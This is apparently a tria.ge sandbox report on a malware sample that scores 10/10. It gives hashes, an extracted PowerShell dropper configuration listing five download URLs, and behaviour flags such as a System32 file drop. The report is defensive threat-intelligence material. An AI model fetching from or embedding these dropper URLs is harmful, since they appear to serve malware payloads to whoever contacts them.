Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

General

  • Target

    89c008a6668cfced5c53f05f3e74b24e_JaffaCakes118

  • Size

    214KB

  • Sample

    240601-ja25qsdh7z

  • MD5

    89c008a6668cfced5c53f05f3e74b24e

  • SHA1

    dd74ab9468c242b2e380a2a94d3990df84adba93

  • SHA256

    7c8c775210220e5ceee72c0c7459877dbcb72068aa6011fa6a29f5e3fda1b5f8

  • SHA512

    fc87efa893d36b7285513840dd5a30988f0478078975f3bd38405d1f47b4ca8d1d8c2c8c1ceafbfe225f9998fdc38663c30ff607a475887e13f3118f72d764a1

  • SSDEEP

    3072:EEd93LpGo0aQLjaxQCF3tmKZQHkrL2VerQfcRoC:EEd2V6xQCpttQwLZQfI

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://uat-essence.oablab.com/cEP88qz

exe.dropper

http://34.207.179.222/GPc2ykD

exe.dropper

http://204.236.197.55/ZmkN6EP

exe.dropper

http://107.23.200.84/EmllsJND2W

exe.dropper

http://radioviverbem.com.br/SZYTAZDa

Targets

    • Target

      89c008a6668cfced5c53f05f3e74b24e_JaffaCakes118

    • Size

      214KB

    • MD5

      89c008a6668cfced5c53f05f3e74b24e

    • SHA1

      dd74ab9468c242b2e380a2a94d3990df84adba93

    • SHA256

      7c8c775210220e5ceee72c0c7459877dbcb72068aa6011fa6a29f5e3fda1b5f8

    • SHA512

      fc87efa893d36b7285513840dd5a30988f0478078975f3bd38405d1f47b4ca8d1d8c2c8c1ceafbfe225f9998fdc38663c30ff607a475887e13f3118f72d764a1

    • SSDEEP

      3072:EEd93LpGo0aQLjaxQCF3tmKZQHkrL2VerQfcRoC:EEd2V6xQCpttQwLZQfI

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Drops file in System32 directory

MITRE ATT&CK Enterprise v15

Tasks